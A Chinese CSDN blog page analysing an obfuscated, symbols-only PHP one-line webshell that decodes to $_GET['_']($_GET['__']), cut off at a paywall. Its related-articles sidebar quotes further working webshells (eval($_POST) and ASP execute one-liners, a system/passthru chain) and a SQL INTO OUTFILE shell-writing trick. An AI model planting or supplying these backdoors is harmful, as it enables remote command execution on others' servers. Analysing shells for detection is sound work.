纯符号一句话webshell PHP代码详解

最新推荐文章于 2024-04-09 18:56:38 发布
最新推荐文章于 2024-04-09 18:56:38 发布
阅读量1.1k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/abcd9com/article/details/26811105
版权
本文详细解析了一段由纯符号组成的PHP一句话后门代码,涉及变量混淆、二进制运算及PHP特性,最终揭露该代码实质为:`$_GET['_']($_GET['__'])`,用于创建webshell链接。
摘要由CSDN通过智能技术生成

<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
${'_'.$_}['_'](${'_'.$_}['__']);
?>
以上是网上流传的一段由纯符号组成的一句话后门代码,这种代码混淆方法主要用以webshell免杀。下文将详细剖析这段看似复杂的PHP变形代码。

第一行:$_="";
定义一个以下划线作为命名的字符变量:$_,赋值为空。
此行实际上不影响代码执行效果,仅增加混淆效果。

第二行:$_[+""]='';
定义一个$_数组元素,其key为+"",赋值为空。
众所周知,P

最低0.47元/天 解锁文章
abcd9com
关注
php一句话webshell 服务端和客户端
05-11
php一句话webshell 服务端和客户端,一句话为 <?php $_GET[2]($_GET[0]($_GET[1]));?> 支持函数system,passthru,shell_exec 可以执行操作系统任意命令,windows linux unix 等。 zhaoxypass@yahoo.com.cn,欢迎下载使用,本软件为免费版。
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话webshell,然后用菜刀连接即可
webshell 一句话木马
无痕的博客
01-12 3555
一句话木马
php一句话获取webshell代码
a843538946的专栏
12-14 3391
&lt;?php @eval($_POST['chopper']);?&gt;
php一句话上传webshell,一句话shell,哪些是恶意的php一句话webshell
weixin_30670745的博客
03-17 387
哪些是恶意的php一句话webshellPHP 是一种创建动态交互性站点2113的强有力的服务器端脚本语5261言。PHP 是免费的,并4102且使用广泛。对于像1653微软 ASP 这样的竞争者来说,PHP 无疑是另一种高效率的选项。PHP 是一种通用开源脚本语言。语法吸收了C语言、Java和Perl的特点,利于学习,使用广泛,主要适用于Web开发领域。shell脚本中的一句话求解释这是用了aw...
WEB漏洞——文件上传
最新发布
qq_63594215的博客
04-09 1227
MIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类,当该扩展名文件被访问的时候,浏览器会自动使用知道应用程序来打开。多用于知道一些客户端自定义的文件名,以及一些媒体文件打开方式。网站允许上传任意文件,然后检查上传文件是否包含Webshell,如果包含删除文件。网站允许上传任意文件,但是如果不是指定类型,那么使用unlink删除文件。
DVWA大通关详解(持续更新)
世间繁华梦一出
11-25 4073
** LOW ** BRUTE Force(爆库) <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELECT * FRO
upload-labs通关详解以及相关知识点
qq_45584159的博客
12-20 5378
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言 前言
linux提权思路总结
weixin_43199413的博客
07-20 1377
linux提权思路总结 前言 说到提权,首先需要获得网站的webshell权限,再说提权的操作。 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。 黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 webshell就是网站管理员,只有站长才可以提升你的权限。 除非你用不正当手法入侵网
免杀代码—— 一句话php
01-15
收集于互联网,仅限个人研究使用。
一句话shellphp
weixin_30497527的博客
03-31 626
1.mysql执行语句拿shell Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>'); select cmd from a into outfile 'E:\\phpStudy\\PHPTutorial\\WWW\\test.php'; ...
php符号漏洞,剖析PHP符号一句话webshell代码
weixin_30260621的博客
03-13 236
复制代码代码如下:$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");${'_'.$_}['_'](${'_'.$_}['__']);?>以上是网上流传的一段由符号组成的一句话后门代码,这种代码混淆方法主要用以webshell免杀。下文将详细剖析这段看似复杂的PHP变形代码。第一行:$_="";定义一个...
php一句话利用,常见php一句话webshell解析
weixin_39606361的博客
03-10 4941
我理解的 webshell 是在服务器上以 web server application (比如apache,iis或者nginx)的权限进行远程任意代码执行的工具。当然通过一些手段也可能可以进行提权。最基础的 php webshell1将 post 请求中的 CMD 参数直接执行。1原理浅析:1、在PHP脚本语言中,eval(code)的功能是将code组合成php指令,然后将指令执行。2、就相...
webshell一句话木马大全
努力是为了让自己更加有方向
04-04 1676
转载:来自WebShell’S Blog,地址:https://www.webshell.cc/2265.html 比较全的webshell一句话包括ASP,PHP,ASPX,JSP asp一句话木马程序代码 <%eval request(“sb”)%> 程序代码 <%execute request(“sb”)%> 程序代码 <%execute(request(“sb”))%> 程序代码 <%execute request(“sb”)%><%’<%
web渗透_一句话木马(webshell)_dvwa环境
摸鱼域的空气。
04-04 8168
厄薇娅·瑞尔说,今天是个好日子。 一、什么是一句话木马 <?php @eval($_POST['a']); ?> 先来一段简单的一句话木马,解析下它的构造: @这个符号的作用是抵制错误提示;eval()函数将接收一个字符串参数,并将这个字符串作为命令语句执行;$_REQUEST['a']从请求参数中得到a这个参数的值,请求参数有两种:GET和POST;a参数名(自定义) 而这段代码的意思就是:用POST方法接收变量a,把变量a里面的字符串当做php代码来执行。 也就是说,你想执行什么代码,.
ACCESS导出一句话webshell
jihaichen的博客
05-04 1109
第一句代码create table cmd (a varchar(50))  第二句代码insert into cmd (a) values ('一句话木马')  第三句代码select * into [a] in 'e:\host\chouwazi.com\web\data\xiao.asp;xiao.xls' 'excel 4.0;' from cmd  第四句代码drop table cmd...
那些强悍的PHP一句话后门
weixin_30338461的博客
05-11 1978
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值